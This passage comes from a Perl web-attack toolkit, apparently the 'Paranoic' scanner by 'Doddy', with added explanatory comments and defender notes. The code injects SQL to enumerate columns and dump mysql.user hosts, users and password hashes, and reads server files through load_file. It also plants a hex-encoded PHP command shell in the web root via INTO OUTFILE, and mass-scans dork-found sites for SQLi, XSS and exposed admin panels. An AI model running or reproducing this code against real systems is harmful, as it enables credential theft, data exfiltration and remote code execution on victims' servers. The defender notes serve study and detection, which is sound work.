          . $pass1 . "from"
          . $pass1
          . "information_schema.columns"
          . $pass1 . "where"
          . $pass1
          . "table_name=char("
          . ascii($table) . ")"
          . $pass1 . "and"
          . $pass1
          . "table_schema=char("
          . ascii($db) . ")"
          . $pass2 );

    if ( $code3 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
        printear( "\n[Columns length : $1 ]\n\n", "text", "13", "5" );
        savefilear( $save . ".txt", "[Columns length : $1 ]\n" );
        my $si = $1;
        chomp $si;
        $page4 =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
        $real = "1";

        # 0 .. $si is inclusive: one request more than the count.
        for my $limit2 ( 0 .. $si ) {
            $code4 =
              toma( $page4
                  . $pass1 . "from"
                  . $pass1
                  . "information_schema.columns"
                  . $pass1 . "where"
                  . $pass1
                  . "table_name=char("
                  . ascii($table) . ")"
                  . $pass1 . "and"
                  . $pass1
                  . "table_schema=char("
                  . ascii($db) . ")"
                  . $pass1 . "limit"
                  . $pass1
                  . $limit2 . ",1"
                  . $pass2 );
            if ( $code4 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
                printear( "[Column $real] : $1\n", "text", "7", "5" );
                savefilear( $save . ".txt", "[Column $real] : $1" );
                $real++;
            }
        }
    }
    else {
        printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" );
    }
}
4090 | ||
# Read Host, User and Password rows from mysql.user through the injectable
# URL, printing them and appending them to "$save.txt".
#
# Parameters:
#   $page   - URL containing the literal placeholder "hackman"
#   $bypass - selector for bypass() (token separator and request suffix)
#   $save   - base name of the results file (".txt" is appended)
#
# $pass1, $pass2, $code and $code1 are package globals (no `my`).
#
# Defender note: this only returns data when the application's database
# account can SELECT from the mysql system schema. Granting the web
# application an account limited to its own schema makes the first probe
# fail. Requests contain `mysql.user` and the marker RATSXPDOWN, either as
# char(...) codes or as the hex literal 0x524154535850444f574e. The results
# file holds credential material in plain text.
sub mysqluser {
    my ( $page, $bypass, $save ) = @_;
    my $cop  = $page;
    my $cop1 = $page;
    savefilear( $save . ".txt", "\n" );
    printear( "\n[+] Finding mysql.users\n", "text", "13", "5" );
    ( $pass1, $pass2 ) = &bypass($bypass);

    # Probe: is mysql.user readable at all? Only the bare marker is selected.
    $page =~ s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
    $code =
      toma( $page . $pass1 . "from" . $pass1 . "mysql.user" . $pass2 );

    if ( $code =~ /RATSXPDOWN/ig ) {
        $cop1 =~
s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
        $code1 =
          toma( $cop1 . $pass1 . "from" . $pass1 . "mysql.user" . $pass2 );
        if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
            printear( "\n[+] Users Found : $1\n\n", "text", "13", "5" );
            savefilear( $save . ".txt", "\n[+] Users mysql Found : $1\n" );

            # The range is built from $1 before the body runs; 0 .. $1 is
            # inclusive, so one request more than the count is attempted.
            for my $limit ( 0 .. $1 ) {

                # Only the first pass changes $cop; afterwards "hackman" is
                # gone and the substitution is a no-op.
                $cop =~
s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
                $code =
                  toma( $cop
                      . $pass1 . "from"
                      . $pass1
                      . "mysql.user"
                      . $pass1 . "limit"
                      . $pass1
                      . $limit . ",1"
                      . $pass2 );
                if ( $code =~
                    /RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig
                  )
                {
                    printear( "[Host] : $1 [User] : $2 [Password] : $3\n",
                        "text", "7", "5" );
                    savefilear( $save . ".txt",
                        "[Host] : $1 [User] : $2 [Password] : $3" );
                }
                else {
                    # First row that does not come back ends the listing
                    # by returning to the menu via reload().
                    &reload;
                }
            }
        }
    }
    else {
        printear( "\n[-] mysql.user = ERROR\n", "text", "5", "5" );
    }
}
4141 | ||
# Guess table names from the word list @buscar2 by issuing one request per
# candidate and checking whether a marker comes back.
#
# Positional arguments (read straight from @_):
#   $_[0] - URL containing the literal placeholder "hackman"
#   $_[1] - selector passed to bypass()
#   $_[2] - base name of the results file (".txt" is appended)
#
# @buscar2 is defined elsewhere in the file. $pass1, $pass2, $concat,
# $injection and $code are package globals (no `my`).
#
# Defender note: the marker ERTOR854 is sent as
# char(69,82,84,79,82,56,53,52). A burst of near-identical requests that
# differ only in the name after `from` is the footprint of this word-list
# guessing; rate limiting and alerting on that pattern apply here.
sub fuzz {
    my $page = $_[0];
    ( $pass1, $pass2 ) = &bypass( $_[1] );
    my $count = "0";
    savefilear( $_[2] . ".txt", "\n" );
    print "\n";

    # Split the URL around the placeholder; $start and $end frame the
    # injected expression.
    if ( $_[0] =~ /(.*)hackman(.*)/g ) {
        my $start = $1;
        my $end   = $2;
        printear( "[+] Searching tables.....\n\n", "text", "13", "5" );
        for my $table (@buscar2) {
            chomp $table;
            $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))";
            $injection =
                $start
              . $concat
              . $end
              . $pass1 . "from"
              . $pass1
              . $table
              . $pass2;
            $code = toma($injection);

            # Marker present means the query ran, i.e. the table exists.
            if ( $code =~ /ERTOR854/g ) {
                $count++;
                printear( "[Table Found] : $table\n", "text", "7", "5" );
                savefilear( $_[2] . ".txt", "[Table Found] : $table" );
            }
        }
    }

    # String comparison against "0"; true when nothing matched, including
    # when the URL held no placeholder at all.
    if ( $count eq "0" ) {
        printear( "[-] Not found any table\n", "text", "5", "5" );
        &reload;
    }
}
4176 | ||
# Guess column names of one table from the word list @buscar1, one request
# per candidate.
#
# Positional arguments (read straight from @_):
#   $_[0] - URL containing the literal placeholder "hackman"
#   $_[1] - selector passed to bypass()
#   $_[2] - table name, placed unencoded after `from`
#   $_[3] - base name of the results file (".txt" is appended)
#
# @buscar1 is defined elsewhere in the file. $pass1, $pass2, $concat and
# $code are package globals (no `my`).
#
# Defender note: same footprint as the table guessing above, with the
# candidate name appearing between two char(69,82,84,79,82,56,53,52)
# (ERTOR854) markers inside concat().
sub fuzzcol {
    my $page = $_[0];
    ( $pass1, $pass2 ) = &bypass( $_[1] );
    my $count = "0";
    savefilear( $_[3] . ".txt", "\n" );
    print "\n";
    if ( $_[0] =~ /(.*)hackman(.*)/ ) {
        my $start = $1;
        my $end   = $2;
        printear(
            "[+] Searching columns for the table ["
              . $_[2] . "]"
              . " ....\n\n",
            "text", "13", "5"
        );
        savefilear( $_[3] . ".txt", "[Table] : $_[2]" );
        for my $columns (@buscar1) {
            chomp $columns;

            # The candidate column is selected between two markers; the
            # query only succeeds if the column exists.
            $concat =
"unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))";
            $code =
              toma( $start
                  . $concat
                  . $end
                  . $pass1 . "from"
                  . $pass1
                  . $_[2]
                  . $pass2 );
            if ( $code =~ /ERTOR854/g ) {
                $count++;
                printear( "[Column Found] : $columns\n", "text", "7", "5" );
                savefilear( $_[3] . ".txt", "[Column Found] : $columns" );
            }
        }
    }
    if ( $count eq "0" ) {
        printear( "[-] Not found any column\n", "text", "5", "5" );
        &reload;
    }
}
4217 | ||
# Try to read each path in @files from the database server with MySQL's
# load_file(), printing and saving any content that is reflected.
#
# Positional arguments (read straight from @_):
#   $_[0] - URL containing the literal placeholder "hackman"
#   $_[1] - selector passed to bypass()
#   $_[2] - base name of the results file (".txt" is appended)
#
# @files and encode() are defined elsewhere; encode() presumably turns the
# path into a form usable without quotes (confirm against its definition).
# $pass1, $pass2 and $concat are package globals (no `my`).
#
# Defender note: load_file() only works for an account holding the FILE
# privilege and for paths allowed by secure_file_priv. Withholding FILE
# from the application account blocks this technique. Requests contain
# `load_file(` and the marker k0bra written as char(107,48,98,114,97).
sub load {
    savefilear( $_[2] . ".txt", "\n" );
    print "\n";
    ( $pass1, $pass2 ) = &bypass( $_[1] );
    if ( $_[0] =~ /(.*)hackman(.*)/g ) {
        printear(
            "[+] Searching files with load_file...\n\n", "text",
            "13",                                        "5"
        );
        my $start = $1;
        my $end   = $2;
        for my $file (@files) {
            chomp $file;
            $concat =
                "unhex(hex(concat(char(107,48,98,114,97),load_file("
              . encode($file)
              . "),char(107,48,98,114,97))))";

            # No `from` clause here: only the suffix $pass2 is appended.
            my $code = toma( $start . $concat . $end . $pass2 );
            chomp $code;

            # /s lets (.*) span newlines, so multi-line file content is
            # captured whole.
            if ( $code =~ /k0bra(.*)k0bra/s ) {
                printear( "[File Found] : $file\n", "text", "11", "5" );
                printear( "\n[Source Start]\n\n",   "text", "7",  "5" );
                printear( "$1",                     "text", "7",  "5" );
                printear( "\n\n[Source End]\n\n",   "text", "7",  "5" );
                savefilear( $_[2] . ".txt", "[File Found] : $file" );
                savefilear( $_[2] . ".txt", "\n[Source Start]\n" );
                savefilear( $_[2] . ".txt", "$1" );
                savefilear( $_[2] . ".txt", "\n[Source End]\n" );
            }
        }
    }
}
4250 | ||
# Interactive variant of load(): ask the operator for one path and try to
# read it from the database server with load_file().
#
# Positional arguments (read straight from @_):
#   $_[0] - URL containing the literal placeholder "hackman"
#   $_[1] - selector passed to bypass()
#   $_[2] - base name of the results file (".txt" is appended)
#
# printear() in "stdin" mode is used for its return value, the line typed
# by the operator. $pass1, $pass2 and $concat are package globals.
#
# Defender note: as with load(), this depends on the FILE privilege and on
# secure_file_priv. Requests contain `load_file(` and the k0bra marker as
# char(107,48,98,114,97).
sub loadfile {
    savefilear( $_[2] . ".txt", "\n" );
    ( $pass1, $pass2 ) = &bypass( $_[1] );
    if ( $_[0] =~ /(.*)hackman(.*)/g ) {
        my $start = $1;
        my $end   = $2;
        my $file  = printear( "\n[+] File to read : ", "stdin", "11", "13" );
        $concat =
            "unhex(hex(concat(char(107,48,98,114,97),load_file("
          . encode($file)
          . "),char(107,48,98,114,97))))";
        my $code = toma( $start . $concat . $end . $pass2 );
        chomp $code;

        # /s lets (.*) span newlines in the returned file content.
        if ( $code =~ /k0bra(.*)k0bra/s ) {
            printear( "\n[File Found] : $file\n", "text", "11", "5" );
            printear( "\n[Source Start]\n\n",     "text", "7",  "5" );
            printear( "$1",                       "text", "7",  "5" );
            printear( "\n\n[Source End]\n\n",     "text", "7",  "5" );
            savefilear( $_[2] . ".txt", "[File Found] : $file" );
            savefilear( $_[2] . ".txt", "\n[Source Start]\n" );
            savefilear( $_[2] . ".txt", "$1" );
            savefilear( $_[2] . ".txt", "\n[Source End]\n" );
        }
    }
}
4276 | ||
# Read two columns of one table row by row through the injectable URL,
# printing each pair and appending it to the results file.
#
# Positional arguments (read straight from @_):
#   $_[0] - URL containing the literal placeholder "hackman"
#   $_[1] - first column name
#   $_[2] - second column name
#   $_[3] - table name
#   $_[4] - selector passed to bypass()
#   $_[5] - base name of the results file (".txt" is appended)
#
# $pass1, $pass2, $concatx, $val_code, $concat, $tota and $injection are
# package globals (no `my`).
#
# Defender note: the footprint is one count() request followed by a run of
# requests that differ only in the `limit N,1` offset, all carrying the
# ERTOR854 marker as char(69,82,84,79,82,56,53,52). The results file holds
# whatever the two columns contain, in plain text.
sub dump {
    savefilear( $_[5] . ".txt", "\n" );
    my $page = $_[0];
    ( $pass1, $pass2 ) = &bypass( $_[4] );
    if ( $page =~ /(.*)hackman(.*)/ ) {
        my $start = $1;
        my $end   = $2;
        printear( "[+] Extracting values...\n", "text", "13", "5" );

        # Row count, taken as count() of the first column.
        $concatx =
"unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
        $val_code =
          toma( $start
              . $concatx
              . $end
              . $pass1 . "from"
              . $pass1
              . $_[3]
              . $pass2 );

        # Per-row expression: marker, column 1, marker, column 2, marker.
        $concat =
"unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
        if ( $val_code =~ /ERTOR854(.*)ERTOR854/ig ) {
            $tota = $1;
            printear(
                "\n[+] Length of the rows : $tota\n\n", "text",
                "13",                                   "5"
            );
            printear( "[+] Extracting values...\n\n", "text", "13", "5" );
            printear( "[$_[1]] [$_[2]]\n\n",          "text", "13", "5" );
            savefilear( $_[5] . ".txt", "[Table] : $_[3]" );
            savefilear( $_[5] . ".txt", "[+] Length of the rows: $tota\n" );
            savefilear( $_[5] . ".txt", "[$_[1]] [$_[2]]\n" );

            # 0 .. $tota is inclusive, so the last iteration asks for a row
            # past the end; that miss takes the else branch below.
            for my $limit ( 0 .. $tota ) {
                chomp $limit;
                $injection =
                  toma( $start
                      . $concat
                      . $end
                      . $pass1 . "from"
                      . $pass1
                      . $_[3]
                      . $pass1 . "limit"
                      . $pass1
                      . $limit . ",1"
                      . $pass2 );
                if ( $injection =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854/ig ) {
                    savefilear( $_[5] . ".txt",
                        "[$_[1]] : $1 [$_[2]] : $2" );
                    printear(
                        "[$_[1]] : $1 [$_[2]] : $2\n", "text",
                        "7",                           "5"
                    );
                }
                else {
                    # First miss is treated as the end of the data.
                    printear( "\n[+] Extracting Finish\n",
                        "text", "13", "5" );
                    &reload;
                }
            }
        }
        else {
            printear( "[-] Not Found any DATA\n\n", "text", "5", "5" );
        }
    }
}
4341 | ||
# Attempt to make the database server write a PHP file named shell.php
# with `into outfile`, then request it over HTTP to see whether it exists.
#
# Parameters:
#   $page   - URL containing the literal placeholder "hackman"
#   $bypass - selector for bypass() (token separator and request suffix)
#   $dir    - server-side directory path; the part matching the URL path is
#             removed from it before "/shell.php" is appended
#   $save   - base name of the results file (".txt" is appended)
#
# $pass1, $pass2, $shell, $code and $code1 are package globals (no `my`).
#
# Defender note: this needs the FILE privilege on the application's
# database account, a secure_file_priv setting that permits the target
# directory, and a web-served directory writable by the database process;
# removing any one of them defeats it. Indicators: request lines
# containing `into` ... `outfile`, a new shell.php under the web root, and
# a page whose title is "Mini Shell By Doddy". The hex literal below is a
# short PHP page with that title which runs a request parameter as an OS
# command.
sub into {
    printear( "\n[Status] : Injecting a SQLI for create a shell\n",
        "text", "13", "5" );
    my ( $page, $bypass, $dir, $save ) = @_;
    savefilear( $save . ".txt", "\n" );
    print "\n";
    ( $pass1, $pass2 ) = &bypass($bypass);
    my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
    if ( $path =~ /\/(.*)$/ ) {
        my $path1 = $1;
        my $path2 = $path1;

        # Both substitutions interpolate the captured URL path as a regex
        # without quoting, so metacharacters in it are interpreted.
        $path2 =~ s/$1//;
        $dir   =~ s/$path1//ig;
        $shell = $dir . "/" . "shell.php";
        if ( $page =~ /(.*)hackman(.*)/ig ) {
            my ( $start, $end ) = ( $1, $2 );
            $code =
              toma( $start
                  . "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
                  . $end
                  . $pass1 . "into"
                  . $pass1
                  . "outfile"
                  . $pass1 . "'"
                  . $shell . "'"
                  . $pass2 );

            # Verification request; the scheme is hard-coded to http.
            $code1 =
              toma( "http://" . $auth . "/" . $path2 . "/" . "shell.php" );
            if ( $code1 =~ /Mini Shell By Doddy/ig ) {
                printear(
                    "[Shell Up] : http://"
                      . $auth . "/"
                      . $path2 . "/"
                      . "shell.php" . "\a\a",
                    "text", "7", "5"
                );
                savefilear(
                    $save . ".txt",
                    "[shell up] : http://"
                      . $auth . "/"
                      . $path2 . "/"
                      . "shell.php"
                );
            }
            else {
                printear( "[Shell] : Not Found", "text", "5", "5" );
            }
        }
    }
}
4392 | ||
4393 | } ## | |
4394 | ||
4395 | sub load_paranoic_old { | |
4396 | ||
4397 | installer_par(); | |
4398 | staq(); | |
4399 | ||
# Entry point of the scanner menu: show the menu, collect a list of target
# pages, run the selected checks on each, then print the running total.
#
# The named subs written inside this body (head_scan, menu_sca, scan) are
# ordinary package-level subs in Perl; nesting them here does not make
# them private. $total_vulnerables is a package global that the individual
# check subs increment.
#
# Defender note: targets come either from a local word list or from
# search-engine results for an operator-supplied query, so probes from this
# code arrive as short, fixed sequences of test requests per page rather
# than as a crawl of one site.
sub staq {

    # Clear the screen (clean() is defined elsewhere) and print the banner.
    sub head_scan {
        clean();
        printear( "


@@@ @@@@ @ @ @ @ @ @@@@@ @@@@@
@ @ @ @ @ @@ @ @@ @ @ @ @
@ @ @ @ @@ @ @@ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @
@@@ @ @ @ @ @ @ @ @ @ @@@@ @@@@@
@ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @@@@@ @ @@ @ @@ @ @ @
@ @ @ @@ @ @ @@ @ @@ @ @ @
@@@ @@@@ @ @ @ @ @ @ @@@@@ @ @




", "logos", "7", "5" );
    }

    &menu_sca;

    # Print the four menu entries, read the choice and pass it to scan().
    sub menu_sca {
        &head_scan;
        printear( "[a] : Scan a File\n", "text", "13", "5" );
        printear(
            "[b] : Search in Google and scan the webs\n", "text",
            "13",                                         "5"
        );
        printear(
            "[c] : Search in Bing and scan the webs\n", "text",
            "13",                                       "5"
        );
        printear( "[d] : Exit\n\n", "text", "13", "5" );
        my $op = printear( "[option] : ", "stdin", "11", "13" );

        scan($op);

    }

    # Build the page list for the chosen source, then dispatch each page to
    # the checks named by the option string returned from men().
    #
    # Argument: the menu choice. It is tested with unanchored,
    # case-insensitive patterns, so any input containing the letter matches.
    # The patterns also carry /g in scalar context: a successful match
    # leaves pos() set on the tested variable and the next test on that
    # variable resumes from there, so the order of the tests matters.
    sub scan {

        my $count;
        my $option;
        my $op = shift;
        my @paginas;

        if ( $op =~ /a/ig ) {

            # Source a: a local word list, de-duplicated by the helpers.
            my $word = printear( "\n[+] Wordlist : ", "stdin", "11", "13" );

            @paginas = repes( cortar( savewordss($word) ) );

            $option = &men;

            if ( $option =~ /Q/ig ) {
                $count =
                  printear( "\n[+] Panels Count : ", "stdin", "11", "13" );
            }

        }

        elsif ( $op =~ /b/ig ) {

            # Source b: search results from google() for the given query.
            my $dork = printear( "\n[+] Dork : ",  "stdin", "11", "13" );
            my $pag  = printear( "\n[+] Pages : ", "stdin", "11", "13" );
            $option = &men;

            if ( $option =~ /Q/ig ) {
                $count =
                  printear( "\n[+] Panels Count : ", "stdin", "11", "13" );
            }

            printear( "\n[+] Searching in Google ...\n", "text", "13",
                "5" );

            @paginas = &google( $dork, $pag );

        }

        elsif ( $op =~ /c/ig ) {

            # Source c: search results from bing() for the given query.
            my $dork = printear( "\n[+] Dork : ",  "stdin", "11", "13" );
            my $pag  = printear( "\n[+] Pages : ", "stdin", "11", "13" );
            $option = &men;

            if ( $option =~ /Q/ig ) {
                $count =
                  printear( "\n[+] Panels Count : ", "stdin", "11", "13" );
            }

            printear( "\n[+] Searching in Bing ...\n", "text", "13", "5" );

            @paginas = &bing( $dork, $pag );

        }

        elsif ( $op =~ /d/ig ) {
            estoydentroporahora();
        }

        else {
            &finish_now;
        }

        printear( "\n[+] Scanning [" . int(@paginas) . "] pages ...\n\n",
            "text", "7", "5" );

        $total_vulnerables = "0";

        # Every matching letter runs its check; the tests are independent
        # `if`s, so several checks can run for the same page.
        for (@paginas) {
            if ( $option =~ /S/ig ) {
                scansql($_);
            }
            if ( $option =~ /K/ig ) {
                sql($_);
            }
            if ( $option =~ /Q/ig ) {
                sqladmin( $_, $count );
            }
            if ( $option =~ /Y/ig ) {
                simple($_);
            }
            if ( $option =~ /L/ig ) {
                lfi($_);
            }
            if ( $option =~ /R/ig ) {
                rfi($_);
            }
            if ( $option =~ /F/ig ) {
                fsd($_);
            }
            if ( $option =~ /X/ig ) {
                scanxss($_);
            }
            if ( $option =~ /M/ig ) {
                mssql($_);
            }
            if ( $option =~ /J/ig ) {
                access($_);
            }
            if ( $option =~ /O/ig ) {
                oracle($_);
            }
            if ( $option =~ /HT/ig ) {
                http($_);
            }

            # "A" runs the listed checks in this fixed order.
            if ( $option =~ /A/ig ) {
                scansql($_);
                scanxss($_);
                mssql($_);
                access($_);
                oracle($_);
                lfi($_);
                rfi($_);
                fsd($_);
                http($_);
            }
        }
    }
    printear( "\n[+] Vulnerable pages found : " . $total_vulnerables . "\n",
        "text", "13", "5" );
    &finish_now;
}
4566 | ||
# Single-request check: append a one-column UNION SELECT to the page URL
# and look for MySQL's column-count error text in the response.
#
# Argument: the page URL (taken with shift).
# Side effects: increments the package global $total_vulnerables and
# appends the URL to sql-logs.txt on a match. $code1 is a package global.
#
# Defender note: the check depends on the database error message being
# returned to the client. Turning off error display in production and
# using parameterized queries removes both the signal and the flaw. The
# request contains `-1+union+select+666--`, which is easy to match in logs.
sub sql {
    my ( $pass1, $pass2 ) = ( "+", "--" );
    my $page = shift;
    $code1 =
      toma( $page . "-1"
          . $pass1 . "union"
          . $pass1
          . "select"
          . $pass1 . "666"
          . $pass2 );
    if ( $code1 =~
        /The used SELECT statements have a different number of columns/ig )
    {
        printear( "[+] SQLI : $page\a\n", "text", "11", "5" );
        $total_vulnerables++;
        savefile( "sql-logs.txt", $page );
    }
}
4585 | ||
# Run the same column-count check as sql(); on a match, also request the
# paths in @paneles on the same host and log those that answer with success.
#
# Positional arguments:
#   $_[0] - page URL
#   $_[1] - maximum number of successful paths to record; an empty string
#           selects the default of 3
#
# @paneles is defined elsewhere (presumably a list of admin-panel paths,
# given the log file name). tomados() is used as "fetch and return a
# response object", since is_success is called on its result.
# $code1, $code and $controlt are package globals (no `my`).
#
# Defender note: after the injection probe, the host receives a run of
# requests for well-known paths from the same client. A burst of 404s
# followed by a 200 on an administrative path is worth alerting on, and
# administrative interfaces should not be reachable without authentication.
sub sqladmin {

    my ( $pass1, $pass2 ) = ( "+", "--" );

    my $page   = $_[0];
    my $limite = $_[1];

    if ( $limite eq "" ) {
        $limite = 3;
    }

    $code1 =
      toma( $page . "-1"
          . $pass1 . "union"
          . $pass1
          . "select"
          . $pass1 . "666"
          . $pass2 );
    if ( $code1 =~
        /The used SELECT statements have a different number of columns/ig )
    {
        printear( "\n[+] SQLI : $page\a\n", "text", "11", "5" );
        $total_vulnerables++;
        savefile( "sql-logs.txt", $page );

        my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);

        # Scheme is hard-coded to http regardless of the original URL.
        my $fage = "http://" . $auth;

        my $count = 0;

        # This loop variable shadows the $path returned by uri_split above.
        for my $path (@paneles) {

            # String comparison of the hit counter against the limit.
            if ( $count eq $limite ) {
                last;
            }

            $code = tomados( $fage . "/" . $path );

            if ( $code->is_success ) {
                $controlt = 1;
                $count++;
                printear(
                    "[+] Link : " . $fage . "/" . $path . "\n", "text",
                    "11",                                       "5"
                );
                savefile( "admin-logs.txt", $fage . "/" . $path );
            }
        }
    }

}
4638 | ||
# Fetch a page and record four response headers (Date, Server, Connection,
# Content-Type) on screen and in http-logs.txt.
#
# Argument: $_[0], the page URL. Output is produced only when the URL
# contains "http://". The request itself is sent before that test.
#
# $nave is a package-level user-agent object created elsewhere; it is used
# here through get(), and header() is called on what get() returns. The
# response status is not checked, and a header that is absent is
# concatenated as whatever header() returns for it.
#
# Defender note: this is banner collection. A Server header that names
# product and version hands that detail to anyone who asks; trimming it is
# a cheap hardening step.
sub http {

    my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );

    my $code = $nave->get( $_[0] );

    if ( $_[0] =~ /http:\/\// ) {

        printear( "\n[+] Page : $auth", "text", "11", "5" );
        printear( "\n[+] Date : " . $code->header('date'),
            "text", "11", "5" );
        printear(
            "\n[+] Server : " . $code->header('server'), "text",
            "11",                                        "5"
        );
        printear( "\n[+] Connection : " . $code->header('connection'),
            "text", "11", "5" );
        printear(
            "\n[+] Content-Type : " . $code->header('content-type') . "\n",
            "text", "11", "5"
        );

        savefile( "http-logs.txt", "\n[+] Page : $auth" );
        savefile( "http-logs.txt", "[+] Date : " . $code->header('date') );
        savefile( "http-logs.txt",
            "[+] Server : " . $code->header('server') );
        savefile( "http-logs.txt",
            "[+] Connection : " . $code->header('connection') );
        savefile( "http-logs.txt",
            "[+] Content-Type : " . $code->header('content-type') );

    }

}
4673 | ||
# Reflected-XSS check: parse the forms on a page, submit a fixed script
# marker in their fields, and report where the marker comes back unencoded.
#
# Positional arguments:
#   $_[0] - page URL
#   $_[1] - when equal to "yes", a newline is put before each GET finding;
#           otherwise $espacio_scan stays undefined
#
# Side effects: increments the package global $total_vulnerables and
# appends findings to xss-logs.txt. $orden and $code are package globals;
# $orden is a scalar unrelated to the lexical @orden, and it is not reset
# in this sub. $nave is the package-level user-agent object.
#
# Behaviour worth knowing when reading the results:
#   - @botones_names, @botones_values and @ordenuno are declared outside
#     the form loop, so entries from earlier forms carry over to later ones.
#   - A submit input with an empty name pushes "submit" and then the empty
#     name as well, while only one value is pushed, so the two button
#     arrays can fall out of step.
#   - @ordendos receives field names only, so the second POST body is a
#     flat list of names rather than name/value pairs.
#   - POST findings are reported only when the recorded entry is numeric
#     (the form's position); forms recorded by name are collected but not
#     printed by the loop at the end.
#
# Defender note: a hit means the page echoes request data into HTML without
# output encoding. Context-aware encoding on output is the fix, and a
# Content-Security-Policy limits the impact of what slips through. The
# marker is the literal `alert(String.fromCharCode(101,115,116,...))`
# inside a script tag, which is distinctive in request logs.
sub scanxss {

    my $page = $_[0];
    my $espacio_scan;
    chomp $page;

    if ( $_[1] eq "yes" ) {
        $espacio_scan = "\n";
    }

    my @testar = HTML::Form->parse( toma($page), "/" );
    my @botones_names;
    my @botones_values;
    my @orden;

    # Two variants of the same marker: bare, and prefixed with `">` to
    # close an attribute first.
    my @pa = (
"<script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>",
'"><script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>'
    );
    my @get_founds;
    my @post_founds;
    my @ordenuno;
    my @ordendos;
    my @valores;

    my $contador_forms = 0;

    # Placeholder value for GET fields; replaced by a marker further down.
    my $valor = "doddyhackman";

    for my $test (@testar) {
        $contador_forms++;
        if ( $test->method eq "POST" ) {
            my @inputs = $test->inputs;
            for my $in (@inputs) {
                if ( $in->type eq "submit" ) {
                    if ( $in->name eq "" ) {
                        push( @botones_names, "submit" );
                    }
                    push( @botones_names,  $in->name );
                    push( @botones_values, $in->value );
                }
                else {
                    push( @ordenuno, $in->name, $pa[0] );
                    push( @valores,  $in->name );
                    push( @ordendos, $in->name );
                }
            }

            # One pair of POSTs per collected submit button.
            for my $n ( 0 .. int(@botones_names) - 1 ) {
                my @preuno = @ordenuno;
                my @predos = @ordendos;
                push( @preuno, $botones_names[$n], $botones_values[$n] );
                push( @predos, $botones_names[$n], $botones_values[$n] );

                my $codeuno = $nave->post( $page, \@preuno )->content;
                my $codedos = $nave->post( $page, \@predos )->content;
                if ( $codeuno =~
/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig
                    or $codedos =~
/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig
                  )
                {
                    # Record the form by position when it has no name.
                    if (   $test->attr(name) eq ""
                        or $test->attr(name) eq " " )
                    {
                        push( @post_founds, $contador_forms );
                    }
                    else {
                        push( @post_founds, $test->attr(name) );
                    }
                }
            }
        }
        else {    # end of the POST branch; everything else is sent as GET
            my @inputs = $test->inputs;
            for my $in (@inputs) {
                if ( $in->type eq "submit" ) {
                    if ( $in->name eq "" ) {
                        push( @botones_names, "submit" );
                    }
                    push( @botones_names,  $in->name );
                    push( @botones_values, $in->value );
                }
                else {
                    $orden .= '' . $in->name . '=' . $valor . '&';
                }
            }
            chop($orden);    # drop the trailing "&"
            for my $n ( 0 .. int(@botones_names) - 1 ) {
                my $partedos =
                  "&" . $botones_names[$n] . "=" . $botones_values[$n];
                my $final = $orden . $partedos;
                for my $strin (@pa) {
                    chomp $strin;

                    # No /g: only the first placeholder is replaced, and
                    # once replaced the second marker finds none left.
                    $final =~ s/doddyhackman/$strin/;
                    $code = toma( $page . "?" . $final );

                    # Quote the marker so it is matched literally.
                    my $strin = "\Q$strin\E";
                    if ( $code =~ /$strin/ ) {
                        push( @get_founds, $page . "?" . $final );
                    }
                }
            }
        }
    }

    my @get_founds = repes(@get_founds);
    if ( int(@get_founds) ne 0 ) {
        for (@get_founds) {
            $total_vulnerables++;
            savefile( "xss-logs.txt", "[+] XSS Found : $_" );
            printear( $espacio_scan . "[+] XSS Found : $_\n\a",
                "text", "11", "5" );
        }
    }

    my @post_founds = repes(@post_founds);
    if ( int(@post_founds) ne 0 ) {
        for my $t (@post_founds) {
            if ( $t =~ /^\d+$/ ) {
                $total_vulnerables++;
                savefile( "xss-logs.txt", "[+] XSS : Form $t in $page" );
                printear(
                    "\n[+] XSS : Form $t in $page\n\a", "text",
                    "11",                               "5"
                );

            }
        }
        printear( "[+] Values : @valores \n", "text", "11", "5" );
    }
}
4804 | ||
# Directory-listing check: fetch a page, take the links found in it, and
# request each link's directory to see whether the server returns an
# "Index of" listing.
#
# Argument: $_[0], the page URL. It is modified in place by the
# substitution below, and because @_ aliases the caller's variables the
# caller's copy changes too.
#
# Side effects: increments the package global $total_vulnerables, appends
# findings to paths-logs.txt, and grows the package global $repetidos,
# a space-separated string of directories already tried. Membership is
# tested with an unquoted regex, so a directory that is a substring of an
# earlier one counts as already seen.
#
# Defender note: a hit means automatic directory indexing is enabled.
# Disabling it in the web server configuration (for example Apache's
